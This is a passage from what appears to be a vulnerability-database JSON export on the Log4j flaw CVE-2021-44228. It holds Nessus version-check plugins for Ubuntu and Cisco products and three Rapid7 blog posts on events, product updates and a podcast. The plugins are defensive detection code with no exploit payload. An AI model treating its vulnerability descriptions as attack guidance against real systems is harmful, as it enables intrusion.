get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('16.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '16.04', 'pkgname': 'liblog4j2-java', 'pkgver': '2.4-2ubuntu0.1~esm1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'liblog4j2-java');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:45:44", "description": "Cisco SD-WAN vManage is affected by the following critical vulnerability in the Apache Log4j Java logging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-05-16T00:00:00", "type": "nessus", "title": "Cisco SD-WAN vManage Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-17T00:00:00", "cpe": ["cpe:/o:cisco:sd-wan_firmware", "cpe:/a:cisco:sd-wan_vmanage"], "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "href": "https://www.tenable.com/plugins/nessus/161212", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161212);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa47745\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-apache-log4j-qRuKNEbd\");\n script_xref(name:\"IAVA\", value:\"2022-A-0138-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Cisco SD-WAN vManage Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cisco SD-WAN vManage is affected by the following critical vulnerability in the Apache Log4j Java \nlogging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?395cf983\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwa47745\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:sd-wan_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:sd-wan_vmanage\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_vedge_detect.nbin\");\n script_require_keys(\"Cisco/Viptela/Version\", \"Cisco/Viptela/Model\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Viptela');\n\nif (tolower(product_info['model']) !~ \"vmanage\")\n audit(AUDIT_HOST_NOT, 'an affected model');\n\nvar vuln_ranges = [\n { 'min_ver' : '20.3', 'fix_ver' : '20.3.4.1' },\n { 'min_ver' : '20.4', 'fix_ver' : '20.4.2.1' },\n { 'min_ver' : '20.5', 'fix_ver' : '20.5.1.1' },\n { 'min_ver' : '20.6', 'fix_ver' : '20.6.2.1' }\n];\n\n \nvar reporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'bug_id' , 'CSCwa47745',\n 'version' , product_info['version'],\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n vuln_ranges:vuln_ranges,\n reporting:reporting\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:45:31", "description": "Cisco Identity Services Engine is affected by the following critical vulnerability in the Apache Log4j Java logging library as descibed in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-05-02T00:00:00", "type": "nessus", "title": "Cisco Identity Services Log4j Engine Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-17T00:00:00", "cpe": ["cpe:/h:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine_software"], "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "href": "https://www.tenable.com/plugins/nessus/160400", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160400);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa47133\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-apache-log4j-qRuKNEbd\");\n script_xref(name:\"IAVA\", value:\"2022-A-0138-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Cisco Identity Services Log4j Engine Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cisco Identity Services Engine is affected by the following critical vulnerability in the Apache Log4j Java \nlogging library as descibed in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?395cf983\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwa47133\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ise_detect.nbin\");\n script_require_keys(\"Host/Cisco/ISE/version\");\n\n exit(0);\n}\ninclude('ccf.inc');\ninclude('cisco_ise_func.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Identity Services Engine Software');\n\nvar vuln_ranges = [\n {'min_ver':'2.4', 'fix_ver':'2.6.0.156', required_patch:'11'},\n {'min_ver':'2.7', 'fix_ver':'2.7.0.356', required_patch:'7'},\n {'min_ver':'3.0', 'fix_ver':'3.0.0.458', required_patch:'5'},\n {'min_ver':'3.1', 'fix_ver':'3.1.0.518', required_patch:'1'}\n];\n\nvar required_patch = get_required_patch(vuln_ranges:vuln_ranges, version:product_info['version']);\n\nif (empty_or_null(required_patch))\n audit(AUDIT_HOST_NOT, 'affected');\n\nvar reporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCwa47133',\n 'disable_caveat', TRUE,\n 'fix' , 'See vendor advisory'\n);\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n vuln_ranges:vuln_ranges,\n required_patch:required_patch\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2022-03-09T17:28:27", "description": "\n\nThe world of the cloud never stops moving \u2014 so neither can cloud security. In the face of rapidly evolving technology and a constantly changing threat landscape, keeping up with all the latest developments, trends, and best practices in this emerging practice is more vital than ever.\n\nEnter Rapid7\u2019s [third annual Cloud Security Summit](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>), which we\u2019ll be hosting this year on Tuesday, March 29. This one-day virtual event is dedicated to [cloud security best practices](<https://www.rapid7.com/fundamentals/cloud-network-security/>) and will feature industry experts from Rapid7, as well as Amazon Web Services (AWS), Snyk, and more. \n\nWhile the event is fully virtual and free, we know that the time commitment can be the most challenging part of attending a multi-hour event during the workday. With that in mind, we\u2019ve compiled a short list of the top reasons you\u2019ll definitely want to register, clear your calendar, and attend this event.\n\n## Reason 1: Get a sneak peak at some original cloud security research\n\nDuring the opening session of this year\u2019s summit, two members of Rapid7\u2019s award-winning security research team will be presenting some never-before-published research on the current state of cloud security operations, the [most common misconfigurations in 2021](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>), [Log4j](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), and more.\n\nAlong with being genuinely interesting data, this research will also give you some insights and benchmarks that will help you evaluate your own [cloud security program](<https://www.rapid7.com/fundamentals/cloud-security/>), and prioritize the most commonly exploited risks in your organization's environment.\n\n## Reason 2: Learn from industry experts, and get CPE credits\n\nAlong with a handful of team member\u2019s from Rapid7\u2019s own cloud security practice, this year\u2019s summit includes a host of subject matter experts from across the industry. You can look forward to hearing from Merritt Baer, Principal in the Office of the CISO at Amazon Web Services; Anthony Seto, Field Director for Cloud Native Application Security at Snyk; Keith Hoodlet, Code Security Architect at GitHub; and more. And that doesn\u2019t even include the InsightCloudSec customers who will be joining to share their expert perspectives as well.\n\nWhile learning and knowledge gain are clearly the most important aspects here, it\u2019s always great to have something extra to show for the time you devoted to an event like this. To help make the case to your management that this event is more than worth the time you\u2019ll put in, we\u2019ve arranged for all attendees to earn 3.5 continuing professional education (CPE) credits to go toward maintaining or upgrading security certifications, such as [CISSP](<https://www.isc2.org/Certifications/CISSP#>), [CISM](<https://www.isaca.org/credentialing/cism/maintain-cism-certification>), and more. \n\n## Reason 3: Be the first to hear exciting Rapid7 announcements\n\nLast but not least, while the event is primarily focused on cloud security research, strategies, and thought leadership, we are also planning to pepper in some exciting news related to [InsightCloudSec](<https://www.rapid7.com/products/insightcloudsec/>), Rapid7\u2019s cloud-native security platform. \n\nWe\u2019ll end the day with a demonstration of the product, so you can see some of our newest capabilities in action. Whether you're already an InsightCloudSec customer, or considering a new solution for uncovering misconfigurations, automating cloud security workflows, shifting left, and more, this is the best way to get a live look at one of the top solutions available in the market today. \n\nSo what are you waiting for? Come join us, and let\u2019s dive into the latest and greatest in cloud security together.\n\n#### Join our 2022 Cloud Security Summit\n\n[Register Now](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>)\n\n \n\n\n \n**_Additional reading_**\n\n * _[Cloud Security and Compliance: The Ultimate Frenemies of Financial Services](<https://www.rapid7.com/blog/post/2022/02/17/cloud-security-and-compliance-the-ultimate-frenemies-of-financial-services/>)_\n * _[Stay Ahead of Threats With Cloud Workload Protection](<https://www.rapid7.com/blog/post/2021/12/10/stay-ahead-of-threats-with-cloud-workload-protection/>)_\n * _[InsightCloudSec Supports 12 New AWS Services Announced at re:Invent](<https://www.rapid7.com/blog/post/2021/12/06/insightcloudsec-supports-12-new-aws-services-announced-at-re-invent/>)_\n * _[Kubernetes Guardrails: Bringing DevOps and Security Together on Cloud](<https://www.rapid7.com/blog/post/2021/12/06/kubernetes-guardrails-bringing-devops-and-security-together-on-cloud/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T17:06:13", "type": "rapid7blog", "title": "3 Reasons to Join Rapid7\u2019s Cloud Security Summit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T17:06:13", "id": "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "href": "https://blog.rapid7.com/2022/03/09/3-reasons-to-join-rapid7s-cloud-security-summit/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T19:35:50", "description": "\n\nThe world of cybersecurity never has a dull moment. While we are still recovering from the aftermath of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), the recent [ContiLeaks](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>) exposed multiple vulnerabilities that have been exploited by the Conti ransomware group. It\u2019s critical for your team to identify the risk posed by such vulnerabilities and implement necessary remediation measures. As you will see, the product updates our vulnerability management (VM) team has made to [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) in the last quarter will empower _you_ to stay in charge \u2014 not the vulnerabilities.\n\nBut that\u2019s not all we\u2019ve improved on. We\u2019ve increased the scope of vulnerabilities tracked by incorporating [CISA\u2019s known exploited vulnerabilities (KEV)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in the Threat Feed, usability enhancements, targeted reporting and scanning, and Log4Shell mitigation checks. And we\u2019ve released our annual [Vulnerability Intelligence Report](<https://www.rapid7.com/products/insightvm/vulnerability-report-hub-page/>) to help you make sense of the vulns that impacted us last year and understand the trends that we will all be facing this year. Our team also offers practical guidance to help the security teams better protect themselves.\n\nLet\u2019s dive into the key feature releases and updates on the vulnerability management front for Q1 2022.\n\n## [InsightVM] ContiLeaks Helpful Query to easily detect ContiLeaks vulns and ensure compliance\n\nCISA\u2019s KEV catalog is part of the agency\u2019s [binding operative directive](<https://www.cisa.gov/binding-operational-directive-22-01>) that has reporting requirements for federal agencies and civilian contractors. The recent ContiLeaks revealed over 30 vulns that are now a part of CISA\u2019s KEV. While users could always build a query in IVM to identify these vulns, doing so is time-consuming and can be prone to error. The ContiLeaks Helpful Query takes out the manual effort and lets customers easily locate 30+ ContiLeaks vulnerabilities in their environments. When the query is loaded into our Specific Vulnerability Dashboard template, it can give an at-a-glance view of the company\u2019s risk posture as it relates to the Conti threat. In addition to helping customers identify the exploited vulnerabilities in their environment, the update will also help them stay within the bounds of CISA\u2019s operative directive.\n\n\n\n\n\n## [InsightVM] Threat feed dashboard now includes CISA\u2019s KEV catalog\n\nWhile we are on the topic of CISA, you will be excited to learn that we have expanded the scope of vulnerabilities tracked to incorporate CISA\u2019s KEV catalog in the InsightVM [Threat Feed Dashboard](<https://www.rapid7.com/blog/post/2017/06/13/live-threat-driven-prioritization/>), including the **Assets With Actively Targeted Vulnerabilities** card and the **Most Common Actively Targeted Vulnerabilities** card. The CISA inclusion makes it easy to see how exposed your organization is to active threats and inform prioritization decisions around remediation efforts. \n\nWe have also added a new \u201cCISA KEV (known exploited vulnerability)\u201d vulnerability category to allow for more targeted scanning (i.e. scanning the environment for CISA KEV entries only). You can also use the CISA KEV category to filter scan reports.\n\n\n\n## \n\n## [Insight VM and Nexpose] A new credential type to support scanning Oracle Databases by Service Name\n\nInsightVM and Nexpose customers have always been able to scan Oracle databases using SIDs (system identifiers) but were previously unable to provide a Service Name in the credential. This meant a gap in visibility for Oracle databases that could only be accessed via their Service Name. We were not happy with this limitation. Now, you now configure Oracle Database scans to specify a Service Name instead of an SID (you can still use the SID, if you want!) when authenticating. You now have the visibility into a wider range of deployment configurations of Oracle Database and the ability to configure scan using Service Name or SID.\n\n\n\n## [Insight VM and Nexpose] Automatic Scan Assistant credentials generation\n\nLast year, [we introduced Scan Assistant](<https://www.rapid7.com/blog/post/2022/02/18/whats-new-in-insightvm-and-nexpose-q4-2021-in-review/>), which alleviates the credential management (for Scan Engine) burden on vulnerability management teams. For the Scan Assistant to communicate with the Scan Engine, it requires digital certificates to be manually created and deployed on both the target assets and the Nexpose / IVM Security Console. Manually creating the public / private key pair is a complex and error-prone process. \n\nWith this update, we are taking some more burden off the vulnerability management teams. You can now use the Shared Credentials management UI to automatically generate Scan Assistant credentials. This not only reduces the technical expertise and time required to manage Scan Assistant credentials but also makes for a user-friendly experience for you.\n\nLearn more in our recent blog post on [passwordless scanning](<https://www.rapid7.com/blog/post/2021/10/18/passwordless-network-scanning-same-insights-less-risk/>).\n\n\n\n## [Insight VM and Nexpose] Log4Shell mitigation checks\n\nThe product improvements list would be incomplete without an update on Log4Shell.\n\nIf you are vulnerable to Log4Shell, you can edit the JAR files on a system to take out the vulnerable code and thus not get exploited. However, it is difficult to keep a check on this manually. This update adds that extra capability to not only look at the version of Log4j that was present in your environment but also check if it has been mitigated \u2014 i.e., if the vulnerable code is removed.\n\nAuthenticated scans and Agent-based assessments can now determine whether the JNDILookup class removal mitigation for Log4Shell has been applied to Log4j JAR files on Windows systems. This will reduce the number of reports of the vulnerability on systems that are not exploitable. We also added an Obsolete Software vulnerability check for Log4j 1.x, which will let you find obsolete versions of Log4j in your environment.\n\n## Stay in charge\n\nAs always, we hope these updates will make it easier for you to stay ahead of vulnerabilities. \n\nIt almost felt like the quarter might end on a calm note, but then the world of cybersecurity never has a dull moment. The end of the quarter saw Spring4Shell, another zero-day vulnerability in the Spring Core module of Spring Framework. [Learn more about Rapid7 response to this vulnerability](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) and how we are working around the clock to help our customers protect their own environments from Spring4Shell.\n\n_**Additional reading: **_\n\n * _[InsightVM Release Notes](<https://docs.rapid7.com/release-notes/insightvm/>)_\n * _[Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)_\n * _[The Rapid7 Annual Vulnerability Intelligence Report Webcast](<https://information.rapid7.com/2021_Vuln_Intelligence_Report_WC.html>)_ \n\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T17:52:17", "type": "rapid7blog", "title": "What's New in InsightVM and Nexpose: Q1 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-19T17:52:17", "id": "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "href": "https://blog.rapid7.com/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T23:31:00", "description": "![\\[Security Nation\\] Mike Hanley of GitHub on the Log4j Vulnerability](https://blog.rapid7.com/content/images/2022/01/security_nation_logo.jpg)\n\nIn our first episode of Security Nation Season 5, Jen and Tod chat with Mike Hanley, Chief Security Officer at GitHub, all about the major vulnerability in Apache\u2019s Log4j logging library (aka Log4Shell). Mike talks about the ins and outs of GitHub\u2019s response to this blockbuster vulnerability and what could have helped the industry deal with an issue of this massive scope more effectively (hint: he drops the SBOM). They also touch on GitHub's updated policy on the sharing of exploits.\n\nStick around for our Rapid Rundown, where Tod and Jen talk about Microsoft\u2019s release of emergency fixes for Windows Server and VPN over Martin Luther King Day weekend.\n\n## Mike Hanley\n\n![\\[Security Nation\\] Mike Hanley of GitHub on the Log4j Vulnerability](https://blog.rapid7.com/content/images/2022/01/image1.jpg)\n\nMike Hanley is the Chief Security Officer at GitHub. Prior to GitHub, Mike was the Vice President of Security at Duo Security, where he built and led the security research, development, and operations functions. After Duo\u2019s acquisition by Cisco for $2.35 billion in 2018, Mike led the transformation of Cisco\u2019s cloud security framework and later served as CISO for the company. Mike also spent several years at CERT/CC as a Senior Member of the Technical Staff and security researcher focused on applied R&amp;D programs for the US Department of Defense and the Intelligence Community.\n\nWhen he\u2019s not talking about security at GitHub, Mike can be found enjoying Ann Arbor, MI with his wife and seven kids.\n\n## Show notes\n\n**Interview links**\n\n * Read [GitHub\u2019s blog](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/>) on the Log4j vulnerability, and [the follow-up](<https://github.blog/2021-12-14-using-githubs-security-features-identify-log4j-exposure-codebase/>).\n * Check out GitHub\u2019s [Dependabot](<https://github.com/dependabot>).\n * Find out [Why Johnny Can\u2019t Encrypt](<https://www.usenix.org/conference/8th-usenix-security-symposium/why-johnny-cant-encrypt-usability-evaluation-pgp-50>).\n * Learn about [GitHub\u2019s Sponsor Program](<https://github.com/sponsors>).\n * Read about the work going on at [OpenSSF](<https://openssf.org/>).\n * Delve into Mike\u2019s [blog post on GitHub\u2019s exploit code policy](<https://github.blog/2021-06-04-updates-to-our-policies-regarding-exploits-malware-and-vulnerability-research/>).\n\n**Rapid Rundown links**\n\n * Get the info on [Microsoft\u2019s emergency fixes](<https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-fixes-for-windows-server-vpn-bugs/>) for Windows Server and VPN bugs.\n\nLike the show? Want to keep Jen and Tod in the podcasting business? Feel free to rate and review with your favorite podcast purveyor, like [**Apple Podcasts**](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784#see-all/reviews>).\n\n#### Want More Inspiring Stories From the Security Community?\n\n[Subscribe to Security Nation Today](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T21:47:30", "type": "rapid7blog", "title": "[Security Nation] Mike Hanley 